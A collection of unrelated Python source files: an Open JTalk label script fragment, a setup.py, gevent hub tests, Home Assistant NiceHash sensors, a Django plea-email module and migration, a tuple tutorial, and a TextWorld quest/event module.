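                    #  which is what the '+' / '-' splitting below extracts.)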
with open(label_full, mode = 'rt', encoding = 'utf-8') as full_wfp:
                        # For each line
for line in full_wfp:
mono = []
words = line.split(' ')
                            # For each field
for word in words:
if '+' in word:
ws1 = word.split('+')[0]
ws2 = ws1.split('-')[1]
mono.append(ws2)
else:
mono.append(word)
                            # Write out the monophone label line
mono_str = ' '.join(map(str, mono))
# print(mono_str)
with open(label_mono, mode = 'a', encoding = 'utf-8') as mono_wfp:
mono_wfp.write(mono_str + '\n')
                # If the log is empty, skip this file
else:
                    # Decrement the index
index -= 1
                    # Delete the voice file
os.remove(output_folder + textfile_id + '.raw')
print()
    # Delete the log
os.remove(open_jtalk_log)
if __name__ == '__main__':
main()
|
py | b40b276af89295d973ed8fae76949971dad95ddc | #!/usr/bin/env python
from distutils.core import setup
setup(name='dlcs-iris-data',
version='0',
description='DLCS Iris session data library',
author='Digirati Ltd',
packages=['dlcs_iris_data',],
license='MIT',
install_requires=[
'iris-data==0'
],
dependency_links=[
'git+https://github.com/digirati-co-uk/iris-data.git#egg=iris-data-0',
],
classifiers=[
'Development Status :: 3 - Alpha',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3 :: Only',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
|
py | b40b28efc82124b66aa2260f10935dd13874582b | # Copyright (c) 2009 AG Projects
# Author: Denis Bilenko
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import re
import time
import greentest
import greentest.timing
import gevent
from gevent import socket
from gevent.hub import Waiter, get_hub
from gevent._compat import NativeStrIO
DELAY = 0.1
class TestCloseSocketWhilePolling(greentest.TestCase):
def test(self):
with self.assertRaises(Exception):
sock = socket.socket()
self._close_on_teardown(sock)
t = get_hub().loop.timer(0, sock.close)
try:
sock.connect(('python.org', 81))
finally:
t.close()
gevent.sleep(0)
class TestExceptionInMainloop(greentest.TestCase):
def test_sleep(self):
# even if there was an error in the mainloop, the hub should continue to work
start = time.time()
gevent.sleep(DELAY)
delay = time.time() - start
delay_range = DELAY * 0.9
self.assertTimeWithinRange(delay, DELAY - delay_range, DELAY + delay_range)
error = greentest.ExpectedException('TestExceptionInMainloop.test_sleep/fail')
def fail():
raise error
with get_hub().loop.timer(0.001) as t:
t.start(fail)
self.expect_one_error()
start = time.time()
gevent.sleep(DELAY)
delay = time.time() - start
self.assert_error(value=error)
self.assertTimeWithinRange(delay, DELAY - delay_range, DELAY + delay_range)
class TestSleep(greentest.timing.AbstractGenericWaitTestCase):
def wait(self, timeout):
gevent.sleep(timeout)
def test_simple(self):
gevent.sleep(0)
class TestWaiterGet(greentest.timing.AbstractGenericWaitTestCase):
def setUp(self):
super(TestWaiterGet, self).setUp()
self.waiter = Waiter()
def wait(self, timeout):
with get_hub().loop.timer(timeout) as evt:
evt.start(self.waiter.switch, None)
return self.waiter.get()
class TestWaiter(greentest.TestCase):
def test(self):
waiter = Waiter()
self.assertEqual(str(waiter), '<Waiter greenlet=None>')
waiter.switch(25)
self.assertEqual(str(waiter), '<Waiter greenlet=None value=25>')
self.assertEqual(waiter.get(), 25)
waiter = Waiter()
waiter.throw(ZeroDivisionError)
assert re.match('^<Waiter greenlet=None exc_info=.*ZeroDivisionError.*$', str(waiter)), str(waiter)
self.assertRaises(ZeroDivisionError, waiter.get)
waiter = Waiter()
g = gevent.spawn(waiter.get)
gevent.sleep(0)
self.assertTrue(str(waiter).startswith('<Waiter greenlet=<Greenlet "Greenlet-'))
g.kill()
@greentest.skipOnCI("Racy on CI")
class TestPeriodicMonitoringThread(greentest.TestCase):
def _reset_hub(self):
hub = get_hub()
try:
del hub.exception_stream
except AttributeError:
pass
if hub._threadpool is not None:
hub.threadpool.join()
hub.threadpool.kill()
del hub.threadpool
def setUp(self):
super(TestPeriodicMonitoringThread, self).setUp()
self.monitor_thread = gevent.config.monitor_thread
gevent.config.monitor_thread = True
self.monitor_fired = 0
self.monitored_hubs = set()
self._reset_hub()
def tearDown(self):
hub = get_hub()
if not self.monitor_thread and hub.periodic_monitoring_thread:
# If it was true, nothing to do. If it was false, tear things down.
hub.periodic_monitoring_thread.kill()
hub.periodic_monitoring_thread = None
gevent.config.monitor_thread = self.monitor_thread
self.monitored_hubs = None
self._reset_hub()
def _monitor(self, hub):
self.monitor_fired += 1
if self.monitored_hubs is not None:
self.monitored_hubs.add(hub)
def test_config(self):
self.assertEqual(0.1, gevent.config.max_blocking_time)
def _run_monitoring_threads(self, monitor, kill=True):
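        # Block until the monitoring thread has invoked our hook at least
        # once, using a Condition as a cross-thread handshake.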
self.assertTrue(monitor.should_run)
from threading import Condition
cond = Condition()
cond.acquire()
def monitor_cond(_hub):
cond.acquire()
cond.notifyAll()
cond.release()
if kill:
# Only run once. Especially helpful on PyPy, where
# formatting stacks is expensive.
monitor.kill()
monitor.add_monitoring_function(monitor_cond, 0.01)
cond.wait()
cond.release()
monitor.add_monitoring_function(monitor_cond, None)
@greentest.ignores_leakcheck
def test_kill_removes_trace(self):
from greenlet import gettrace
hub = get_hub()
hub.start_periodic_monitoring_thread()
self.assertIsNotNone(gettrace())
hub.periodic_monitoring_thread.kill()
self.assertIsNone(gettrace())
@greentest.ignores_leakcheck
def test_blocking_this_thread(self):
hub = get_hub()
stream = hub.exception_stream = NativeStrIO()
monitor = hub.start_periodic_monitoring_thread()
self.assertIsNotNone(monitor)
self.assertEqual(2, len(monitor.monitoring_functions()))
monitor.add_monitoring_function(self._monitor, 0.1)
self.assertEqual(3, len(monitor.monitoring_functions()))
self.assertEqual(self._monitor, monitor.monitoring_functions()[-1].function)
self.assertEqual(0.1, monitor.monitoring_functions()[-1].period)
# We must make sure we have switched greenlets at least once,
# otherwise we can't detect a failure.
gevent.sleep(0.0001)
assert hub.exception_stream is stream
try:
time.sleep(0.3) # Thrice the default
self._run_monitoring_threads(monitor)
finally:
monitor.add_monitoring_function(self._monitor, None)
self.assertEqual(2, len(monitor._monitoring_functions))
assert hub.exception_stream is stream
monitor.kill()
del hub.exception_stream
self.assertGreaterEqual(self.monitor_fired, 1)
data = stream.getvalue()
self.assertIn('appears to be blocked', data)
self.assertIn('PeriodicMonitoringThread', data)
def _prep_worker_thread(self):
hub = get_hub()
threadpool = hub.threadpool
worker_hub = threadpool.apply(get_hub)
stream = worker_hub.exception_stream = NativeStrIO()
# It does not have a monitoring thread yet
self.assertIsNone(worker_hub.periodic_monitoring_thread)
# So switch to it and give it one.
threadpool.apply(gevent.sleep, (0.01,))
self.assertIsNotNone(worker_hub.periodic_monitoring_thread)
worker_monitor = worker_hub.periodic_monitoring_thread
worker_monitor.add_monitoring_function(self._monitor, 0.1)
return worker_hub, stream, worker_monitor
@greentest.ignores_leakcheck
def test_blocking_threadpool_thread_task_queue(self):
# A threadpool thread spends much of its time
# blocked on the native Lock object. Unless we take
# care, if that thread had created a hub, it will constantly
# be reported as blocked.
worker_hub, stream, worker_monitor = self._prep_worker_thread()
# Now wait until the monitoring threads have run.
self._run_monitoring_threads(worker_monitor)
worker_monitor.kill()
# We did run the monitor in the worker thread, but it
# did NOT report itself blocked by the worker thread sitting there.
self.assertIn(worker_hub, self.monitored_hubs)
self.assertEqual(stream.getvalue(), '')
@greentest.ignores_leakcheck
def test_blocking_threadpool_thread_one_greenlet(self):
# If the background threadpool thread has no other greenlets to run
# and never switches, then even if it has a hub
# we don't report it blocking. The threadpool is *meant* to run
# tasks that block.
hub = get_hub()
threadpool = hub.threadpool
worker_hub, stream, worker_monitor = self._prep_worker_thread()
task = threadpool.spawn(time.sleep, 0.3)
# Now wait until the monitoring threads have run.
self._run_monitoring_threads(worker_monitor)
# and be sure the task ran
task.get()
worker_monitor.kill()
# We did run the monitor in the worker thread, but it
# did NOT report itself blocked by the worker thread
self.assertIn(worker_hub, self.monitored_hubs)
self.assertEqual(stream.getvalue(), '')
@greentest.ignores_leakcheck
def test_blocking_threadpool_thread_multi_greenlet(self):
# If the background threadpool thread ever switches
# greenlets, monitoring goes into affect.
hub = get_hub()
threadpool = hub.threadpool
worker_hub, stream, worker_monitor = self._prep_worker_thread()
def task():
g = gevent.spawn(time.sleep, 0.7)
g.join()
task = threadpool.spawn(task)
# Now wait until the monitoring threads have run.
self._run_monitoring_threads(worker_monitor, kill=False)
# and be sure the task ran
task.get()
worker_monitor.kill()
# We did run the monitor in the worker thread, and it
# DID report itself blocked by the worker thread
self.assertIn(worker_hub, self.monitored_hubs)
data = stream.getvalue()
self.assertIn('appears to be blocked', data)
self.assertIn('PeriodicMonitoringThread', data)
if __name__ == '__main__':
greentest.main()
|
py | b40b28ffe0990fb6f710155cf41dedde71fe6bf1 | """
NiceHash Rig Device Sensors
"""
from datetime import datetime
import logging
from homeassistant.const import ATTR_ATTRIBUTION
from homeassistant.helpers.entity import Entity
from .const import (
DEVICE_STATUS_UNKNOWN,
DEVICE_LOAD,
DEVICE_RPM,
DEVICE_SPEED_ALGORITHM,
DEVICE_SPEED_RATE,
ICON_PICKAXE,
ICON_PULSE,
ICON_THERMOMETER,
ICON_SPEEDOMETER,
NICEHASH_ATTRIBUTION,
)
from .coordinators import MiningRigsDataUpdateCoordinator
from .nicehash import MiningRig, MiningRigDevice
_LOGGER = logging.getLogger(__name__)
class DeviceSensor(Entity):
"""
Mining rig device sensor
"""
def __init__(
self,
coordinator: MiningRigsDataUpdateCoordinator,
rig: MiningRig,
device: MiningRigDevice,
):
"""Initialize the sensor"""
self.coordinator = coordinator
self._rig_id = rig.id
self._rig_name = rig.name
self._device_id = device.id
self._device_name = device.name
@property
def name(self):
"""Sensor name"""
return f"{self._device_name}"
@property
def should_poll(self):
"""No need to poll, Coordinator notifies entity of updates"""
return False
@property
def available(self):
"""Whether sensor is available"""
return self.coordinator.last_update_success
@property
def icon(self):
"""Sensor icon"""
return ICON_PICKAXE
@property
def unit_of_measurement(self):
"""Sensor unit of measurement"""
return None
async def async_added_to_hass(self):
"""Connect to dispatcher listening for entity data notifications"""
self.async_on_remove(
self.coordinator.async_add_listener(self.async_write_ha_state)
)
async def async_update(self):
"""Update entity"""
await self.coordinator.async_request_refresh()
def _get_device(self):
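        """Look up this sensor's device in the coordinator's latest data."""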
try:
mining_rigs = self.coordinator.data.get("miningRigs")
rig = MiningRig(mining_rigs.get(self._rig_id))
return rig.devices.get(self._device_id)
except Exception as e:
_LOGGER.error(f"Unable to get mining device ({self._device_id})\n{e}")
class DeviceStatusSensor(DeviceSensor):
"""
Displays status of a mining rig device
"""
_status = "Unknown"
@property
def name(self):
"""Sensor name"""
return f"{self._device_name} Status"
@property
def unique_id(self):
"""Unique entity id"""
return f"{self._device_id}:status"
@property
def state(self):
"""Sensor state"""
device = self._get_device()
if device:
self._status = device.status
else:
self._status = "Unknown"
return self._status
@property
def icon(self):
"""Sensor icon"""
return ICON_PULSE
@property
def device_state_attributes(self):
"""Sensor device state attributes"""
return {
ATTR_ATTRIBUTION: NICEHASH_ATTRIBUTION,
"status": self._status,
"rig": self._rig_name,
}
class DeviceSpeedSensor(DeviceSensor):
"""
Displays speed of a mining rig device
"""
_algorithm = None
_speed = 0.00
_speed_unit = "MH"
@property
def name(self):
"""Sensor name"""
return f"{self._device_name} Speed"
@property
def unique_id(self):
"""Unique entity id"""
return f"{self._device_id}:speed"
@property
def state(self):
"""Sensor state"""
device = self._get_device()
if device and len(device.speeds) > 0:
algorithm = device.speeds[0]
self._algorithm = algorithm.get("title")
self._speed = algorithm.get("speed")
self._speed_unit = algorithm.get("displaySuffix")
else:
self._algorithm = "Unknown"
self._speed = 0.00
self._speed_unit = "MH"
return self._speed
@property
def icon(self):
"""Sensor icon"""
return ICON_SPEEDOMETER
@property
def unit_of_measurement(self):
"""Sensor unit of measurement"""
return f"{self._speed_unit}/s"
@property
def device_state_attributes(self):
"""Sensor device state attributes"""
return {
ATTR_ATTRIBUTION: NICEHASH_ATTRIBUTION,
"algorithm": self._algorithm,
"speed": self._speed,
"speed_unit": self._speed_unit,
"rig": self._rig_name,
}
class DeviceAlgorithmSensor(DeviceSensor):
"""
Displays algorithm of a mining rig device
"""
_algorithm = None
_speed = 0.00
_speed_unit = "MH"
@property
def name(self):
"""Sensor name"""
return f"{self._device_name} Algorithm"
@property
def unique_id(self):
"""Unique entity id"""
return f"{self._device_id}:algorithm"
@property
def state(self):
"""Sensor state"""
device = self._get_device()
if device and len(device.speeds) > 0:
algorithm = device.speeds[0]
self._algorithm = algorithm.get("title")
self._speed = algorithm.get("speed")
self._speed_unit = algorithm.get("displaySuffix")
else:
self._algorithm = "Unknown"
self._speed = 0.00
self._speed_unit = "MH"
return self._algorithm
@property
def icon(self):
"""Sensor icon"""
return ICON_PICKAXE
@property
def device_state_attributes(self):
"""Sensor device state attributes"""
return {
ATTR_ATTRIBUTION: NICEHASH_ATTRIBUTION,
"algorithm": self._algorithm,
"speed": self._speed,
"speed_unit": self._speed_unit,
"rig": self._rig_name,
}
class DeviceTemperatureSensor(DeviceSensor):
"""
Displays temperature of a mining rig device
"""
_temperature = 0
@property
def name(self):
"""Sensor name"""
return f"{self._device_name} Temperature"
@property
def unique_id(self):
"""Unique entity id"""
return f"{self._device_id}:temperature"
@property
def state(self):
"""Sensor state"""
device = self._get_device()
if device:
self._temperature = device.temperature
else:
self._temperature = 0
return self._temperature
@property
def icon(self):
"""Sensor icon"""
return ICON_THERMOMETER
@property
def unit_of_measurement(self):
"""Sensor unit of measurement"""
# Not Celsius because then HA might convert to Fahrenheit
return "C"
@property
def device_state_attributes(self):
"""Sensor device state attributes"""
return {
ATTR_ATTRIBUTION: NICEHASH_ATTRIBUTION,
"temperature": self._temperature,
"rig": self._rig_name,
}
class DeviceLoadSensor(DeviceSensor):
"""
Displays load of a mining rig device
"""
_load = 0
@property
def name(self):
"""Sensor name"""
return f"{self._device_name} Load"
@property
def unique_id(self):
"""Unique entity id"""
return f"{self._device_id}:load"
@property
def state(self):
"""Sensor state"""
device = self._get_device()
if device:
self._load = device.load
else:
self._load = 0
return self._load
@property
def icon(self):
"""Sensor icon"""
return ICON_SPEEDOMETER
@property
def unit_of_measurement(self):
"""Sensor unit of measurement"""
return "%"
@property
def device_state_attributes(self):
"""Sensor device state attributes"""
return {
ATTR_ATTRIBUTION: NICEHASH_ATTRIBUTION,
"load": self._load,
"rig": self._rig_name,
}
class DeviceRPMSensor(DeviceSensor):
"""
Displays RPM of a mining rig device
"""
@property
def name(self):
"""Sensor name"""
return f"{self._device_name} RPM"
@property
def unique_id(self):
"""Unique entity id"""
return f"{self._device_id}:rpm"
@property
def state(self):
"""Sensor state"""
device = self._get_device()
if device:
self._rpm = device.rpm
else:
self._rpm = 0
return self._rpm
@property
def icon(self):
"""Sensor icon"""
return ICON_SPEEDOMETER
@property
def unit_of_measurement(self):
"""Sensor unit of measurement"""
return "RPM"
@property
def device_state_attributes(self):
"""Sensor device state attributes"""
return {
ATTR_ATTRIBUTION: NICEHASH_ATTRIBUTION,
"rpm": self._rpm,
"rig": self._rig_name,
}
|
py | b40b294739fccce10e20445315eb97988e6b040a | import datetime as dt
from dateutil import parser
import logging
from django.conf import settings
from django.template.loader import render_to_string
from django.utils.text import wrap
from django.utils import translation
from django.utils.translation import ugettext as _
from .models import Case, CourtEmailCount, Court
from .encrypt import encrypt_and_store_user_data
from .tasks import email_send_court, email_send_prosecutor, email_send_user
from .standardisers import format_for_region, standardise_name
logger = logging.getLogger(__name__)
def get_plea_type(context_data):
"""
Determine if pleas for a submission are
all guilty - returns "guilty"
all not guilty - returns "not_guilty"
or mixed - returns "mixed"
"""
guilty_count = len([plea for plea in context_data["plea"]["data"]
if plea["guilty"] == "guilty_court" or plea["guilty"] == "guilty_no_court"])
if guilty_count == 0:
return "not_guilty"
elif guilty_count == len(context_data["plea"]["data"]):
return "guilty"
else:
return "mixed"
def send_plea_email(context_data):
"""
Sends a plea email. All addresses, content etc. are defined in
settings.
context_data: dict populated by form fields
"""
case = Case.objects.filter(
urn__iexact=context_data["case"]["urn"].upper(), sent=False,
imported=True).first()
if not case:
case = Case.objects.create(urn=context_data["case"]["urn"].upper(),
sent=False,
imported=False)
court_obj = Court.objects.get_court(context_data["case"]["urn"], ou_code=case.ou_code)
email_address = context_data.get("your_details", {}).get("email", False)
email_address = email_address or context_data.get("company_details", {}).get("email", False)
context_data["email"] = email_address
# add DOH / name to the email subject for compliance with the current format
if not context_data["notice_type"]["sjp"]:
if isinstance(context_data["case"]["date_of_hearing"], str):
date_of_hearing = parser.parse(context_data["case"]["date_of_hearing"])
else:
date_of_hearing = context_data["case"]["date_of_hearing"]
context_data["email_date_of_hearing"] = date_of_hearing.strftime("%Y-%m-%d")
if context_data["case"]["plea_made_by"] == "Defendant":
first_name = context_data["your_details"]["first_name"]
middle_name = context_data["your_details"]["middle_name"]
last_name = context_data["your_details"]["last_name"]
else:
first_name = context_data["company_details"]["first_name"]
middle_name = ""
last_name = context_data["company_details"]["last_name"]
if "date_of_birth" in context_data["case"]:
context_data["your_details"]["date_of_birth"] = context_data["case"]["date_of_birth"]
context_data["email_name"] = " ".join([last_name.upper(), first_name, middle_name]).strip()
# Add Welsh flag if journey was completed in Welsh
if translation.get_language() == "cy":
context_data["welsh_language"] = True
if context_data["notice_type"]["sjp"]:
case.initiation_type = "J"
case.language = translation.get_language().split("-")[0]
case.name = standardise_name(first_name, last_name)
case.completed_on = dt.datetime.now()
if context_data["case"]["plea_made_by"] == "Company representative":
if case.extra_data and "OrganisationName" in case.extra_data:
case.extra_data["OrganisationName"] = context_data.get("company_details", {}).get("company_name")
else:
case.extra_data = {"OrganisationName": context_data.get("company_details", {}).get("company_name")}
if email_address:
case.email = email_address
case.send_user_email = True
case.save()
if getattr(settings, "STORE_USER_DATA", False):
encrypt_and_store_user_data(case.urn, case.id, context_data)
if not court_obj.test_mode:
# don't add test court entries to the anon stat data
email_count = CourtEmailCount()
email_count.get_from_context(context_data, court=court_obj)
email_count.save()
email_count_id = email_count.id
else:
# use a fake email count ID as we're using a test record
email_count_id = "XX"
email_send_court.delay(case.id, email_count_id, context_data)
if court_obj.plp_email:
email_send_prosecutor.delay(case.id, context_data)
if email_address:
data = {
"urn": format_for_region(context_data["case"]["urn"]),
"plea_made_by": context_data["case"]["plea_made_by"],
"number_of_charges": context_data["case"]["number_of_charges"],
"contact_deadline": context_data["case"]["contact_deadline"],
"plea_type": get_plea_type(context_data),
"court_name": court_obj.court_name,
"court_email": court_obj.court_email
}
email_template = "emails/user_plea_confirmation"
try:
if context_data["notice_type"]["sjp"]:
email_template = "emails/user_plea_confirmation_sjp"
except KeyError:
pass
html_body = render_to_string(email_template + ".html", data)
txt_body = wrap(render_to_string(email_template + ".txt", data), 72)
subject = _("Online plea submission confirmation")
email_send_user.delay(case.id, email_address, subject, html_body, txt_body)
else:
case.add_action("No email entered, user email not sent", "")
return True
|
py | b40b2adc03a369aa2898d55a39ba7d8f1274b3f4 | # Generated by Django 2.1.15 on 2021-03-10 11:29
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
py | b40b2b8f2c3f98ff8ca0020b00d30d5dca99168f | from collections import namedtuple
import os
lax_coordinates = (33.9425, -118.408056)
city, year, pop, chg, area = ('Tokyo', 2003, 32450, 0.66, 8014)
traveler_ids = [('USA', '31195855'), ('BRA', 'CE342567'),
('ESP', 'XDA205856')]
for passport in sorted(traveler_ids):
print('%s / %s' % passport)
# The for loop knows how to retrieve the items of a tuple separately—this is called
# “unpacking.” Here we are not interested in the second item, so it’s assigned to
# _, a dummy variable.
for city, _ in sorted(traveler_ids):
print(city)
# Extended Iterable Unpacking
a, *b, c = range(5)
print(a, b, c)
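# -> 0 [1, 2, 3] 4  (the starred target absorbs the middle items as a list)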
print(*range(10))
# swapping
b, a = a, b
a, b = divmod(20, 5)
print(a, b)
t = (20, 8)
divmod(*t)
quotient, remainder = divmod(*t)
print(quotient, remainder)
print(os.getcwd())
_, filename = os.path.split(os.getcwd())
print(filename)
City = namedtuple('City', 'name country population coordinates')
tokyo = City('Tokyo', 'JP', 36.933, (35.689722, 139.691667))
print(tokyo)
def testfunc(x: int):
print(x)
testfunc(10)
print(City._fields)
print(tokyo._asdict())
for ke, vl in tokyo._asdict().items():
print(ke, vl)
print(tokyo.count(tokyo))
name = "Sudeep Mahesh chandra patel"
firstname = slice(0, 6)
print(name[firstname])
|
py | b40b2bdeb41ef8b8308691a9dc759efb39b6f374 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
import copy
import json
import textwrap
from typing import List, Dict, Optional, Mapping, Any, Iterable, Union, Tuple
from collections import OrderedDict
from numpy.random import RandomState
from textworld import g_rng
from textworld.utils import encode_seeds
from textworld.generator.data import KnowledgeBase
from textworld.generator.text_grammar import Grammar, GrammarOptions
from textworld.generator.world import World
from textworld.logic import Action, Proposition, State
from textworld.generator.graph_networks import DIRECTIONS
from textworld.generator.chaining import ChainingOptions
from textworld.generator.dependency_tree import DependencyTree
from textworld.generator.dependency_tree import DependencyTreeElement
try:
from typing import Collection
except ImportError:
# Collection is new in Python 3.6 -- fall back on Iterable for 3.5
from typing import Iterable as Collection
class UnderspecifiedEventError(NameError):
def __init__(self):
msg = "Either the actions or the conditions is needed to create an event."
super().__init__(msg)
class UnderspecifiedQuestError(NameError):
def __init__(self):
msg = "At least one winning or failing event is needed to create a quest."
super().__init__(msg)
def gen_commands_from_actions(actions: Iterable[Action], kb: Optional[KnowledgeBase] = None) -> List[str]:
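    """ Generate human-readable command strings for a sequence of actions,
    using the knowledge base's Inform 7 command templates. """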
kb = kb or KnowledgeBase.default()
def _get_name_mapping(action):
mapping = kb.rules[action.name].match(action)
return {ph.name: var.name for ph, var in mapping.items()}
commands = []
for action in actions:
command = "None"
if action is not None:
command = kb.inform7_commands[action.name]
command = command.format(**_get_name_mapping(action))
commands.append(command)
return commands
class Event:
"""
Event happening in TextWorld.
    An event gets triggered when all of its conditions become satisfied.
Attributes:
actions: Actions to be performed to trigger this event
commands: Human readable version of the actions.
condition: :py:class:`textworld.logic.Action` that can only be applied
            when all conditions are satisfied.
"""
def __init__(self, actions: Iterable[Action] = (),
conditions: Iterable[Proposition] = (),
commands: Iterable[str] = ()) -> None:
"""
Args:
actions: The actions to be performed to trigger this event.
If an empty list, then `conditions` must be provided.
conditions: Set of propositions which need to
be all true in order for this event
to get triggered.
commands: Human readable version of the actions.
"""
self.actions = actions
self.commands = commands
self.condition = self.set_conditions(conditions)
@property
def actions(self) -> Iterable[Action]:
return self._actions
@actions.setter
def actions(self, actions: Iterable[Action]) -> None:
self._actions = tuple(actions)
@property
def commands(self) -> Iterable[str]:
return self._commands
@commands.setter
def commands(self, commands: Iterable[str]) -> None:
self._commands = tuple(commands)
def is_triggering(self, state: State) -> bool:
""" Check if this event would be triggered in a given state. """
return state.is_applicable(self.condition)
def set_conditions(self, conditions: Iterable[Proposition]) -> Action:
"""
Set the triggering conditions for this event.
Args:
conditions: Set of propositions which need to
be all true in order for this event
to get triggered.
Returns:
            Action that can only be applied when all conditions are satisfied.
"""
if not conditions:
if len(self.actions) == 0:
raise UnderspecifiedEventError()
# The default winning conditions are the postconditions of the
# last action in the quest.
conditions = self.actions[-1].postconditions
variables = sorted(set([v for c in conditions for v in c.arguments]))
event = Proposition("event", arguments=variables)
self.condition = Action("trigger", preconditions=conditions,
postconditions=list(conditions) + [event])
return self.condition
def __hash__(self) -> int:
return hash((self.actions, self.commands, self.condition))
def __eq__(self, other: Any) -> bool:
return (isinstance(other, Event)
and self.actions == other.actions
and self.commands == other.commands
and self.condition == other.condition)
@classmethod
def deserialize(cls, data: Mapping) -> "Event":
""" Creates an `Event` from serialized data.
Args:
data: Serialized data with the needed information to build a
`Event` object.
"""
actions = [Action.deserialize(d) for d in data["actions"]]
condition = Action.deserialize(data["condition"])
event = cls(actions, condition.preconditions, data["commands"])
return event
def serialize(self) -> Mapping:
""" Serialize this event.
        Returns:
`Event`'s data serialized to be JSON compatible.
"""
data = {}
data["commands"] = self.commands
data["actions"] = [action.serialize() for action in self.actions]
data["condition"] = self.condition.serialize()
return data
def copy(self) -> "Event":
""" Copy this event. """
return self.deserialize(self.serialize())
class Quest:
""" Quest representation in TextWorld.
A quest is defined by a mutually exclusive set of winning events and
a mutually exclusive set of failing events.
Attributes:
win_events: Mutually exclusive set of winning events. That is,
only one such event needs to be triggered in order
to complete this quest.
fail_events: Mutually exclusive set of failing events. That is,
only one such event needs to be triggered in order
to fail this quest.
reward: Reward given for completing this quest.
desc: A text description of the quest.
commands: List of text commands leading to this quest completion.
"""
def __init__(self,
win_events: Iterable[Event] = (),
fail_events: Iterable[Event] = (),
reward: Optional[int] = None,
desc: Optional[str] = None,
commands: Iterable[str] = ()) -> None:
r"""
Args:
win_events: Mutually exclusive set of winning events. That is,
only one such event needs to be triggered in order
to complete this quest.
fail_events: Mutually exclusive set of failing events. That is,
only one such event needs to be triggered in order
to fail this quest.
reward: Reward given for completing this quest. By default,
reward is set to 1 if there is at least one winning events
otherwise it is set to 0.
desc: A text description of the quest.
commands: List of text commands leading to this quest completion.
"""
self.win_events = tuple(win_events)
self.fail_events = tuple(fail_events)
self.desc = desc
self.commands = tuple(commands)
# Unless explicitly provided, reward is set to 1 if there is at least
# one winning events otherwise it is set to 0.
self.reward = int(len(win_events) > 0) if reward is None else reward
if len(self.win_events) == 0 and len(self.fail_events) == 0:
raise UnderspecifiedQuestError()
@property
def win_events(self) -> Iterable[Event]:
return self._win_events
@win_events.setter
def win_events(self, events: Iterable[Event]) -> None:
self._win_events = tuple(events)
@property
def fail_events(self) -> Iterable[Event]:
return self._fail_events
@fail_events.setter
def fail_events(self, events: Iterable[Event]) -> None:
self._fail_events = tuple(events)
@property
def commands(self) -> Iterable[str]:
return self._commands
@commands.setter
def commands(self, commands: Iterable[str]) -> None:
self._commands = tuple(commands)
def is_winning(self, state: State) -> bool:
""" Check if this quest is winning in that particular state. """
return any(event.is_triggering(state) for event in self.win_events)
def is_failing(self, state: State) -> bool:
""" Check if this quest is failing in that particular state. """
return any(event.is_triggering(state) for event in self.fail_events)
def __hash__(self) -> int:
return hash((self.win_events, self.fail_events, self.reward,
self.desc, self.commands))
def __eq__(self, other: Any) -> bool:
return (isinstance(other, Quest)
and self.win_events == other.win_events
and self.fail_events == other.fail_events
and self.reward == other.reward
and self.desc == other.desc
and self.commands == other.commands)
@classmethod
def deserialize(cls, data: Mapping) -> "Quest":
""" Creates a `Quest` from serialized data.
Args:
data: Serialized data with the needed information to build a
`Quest` object.
"""
win_events = [Event.deserialize(d) for d in data["win_events"]]
fail_events = [Event.deserialize(d) for d in data["fail_events"]]
commands = data.get("commands", [])
reward = data["reward"]
desc = data["desc"]
return cls(win_events, fail_events, reward, desc, commands)
def serialize(self) -> Mapping:
""" Serialize this quest.
        Returns:
Quest's data serialized to be JSON compatible
"""
data = {}
data["desc"] = self.desc
data["reward"] = self.reward
data["commands"] = self.commands
data["win_events"] = [event.serialize() for event in self.win_events]
data["fail_events"] = [event.serialize() for event in self.fail_events]
return data
def copy(self) -> "Quest":
""" Copy this quest. """
return self.deserialize(self.serialize())
class EntityInfo:
""" Additional information about entities in the game. """
__slots__ = ['id', 'type', 'name', 'noun', 'adj', 'desc', 'room_type', 'definite', 'indefinite', 'synonyms']
def __init__(self, id: str, type: str) -> None:
#: str: Unique name for this entity. It is used when generating
self.id = id
#: str: The type of this entity.
self.type = type
#: str: The name that will be displayed in-game to identify this entity.
self.name = None
#: str: The noun part of the name, if available.
self.noun = None
#: str: The adjective (i.e. descriptive) part of the name, if available.
self.adj = None
#: str: The definite article to use for this entity.
self.definite = None
#: str: The indefinite article to use for this entity.
self.indefinite = None
#: List[str]: Alternative names that can be used to refer to this entity.
self.synonyms = None
#: str: Text description displayed when examining this entity in the game.
self.desc = None
#: str: Type of the room this entity belongs to. It used to influence
#: its `name` during text generation.
self.room_type = None
def __eq__(self, other: Any) -> bool:
return (isinstance(other, EntityInfo)
and all(getattr(self, slot) == getattr(other, slot)
for slot in self.__slots__))
def __hash__(self) -> int:
return hash(tuple(getattr(self, slot) for slot in self.__slots__))
def __str__(self) -> str:
return "Info({}: {} | {})".format(self.name, self.adj, self.noun)
@classmethod
def deserialize(cls, data: Mapping) -> "EntityInfo":
""" Creates a `EntityInfo` from serialized data.
Args:
data: Serialized data with the needed information to build a
`EntityInfo` object.
"""
info = cls(data["id"], data["type"])
for slot in cls.__slots__:
setattr(info, slot, data.get(slot))
return info
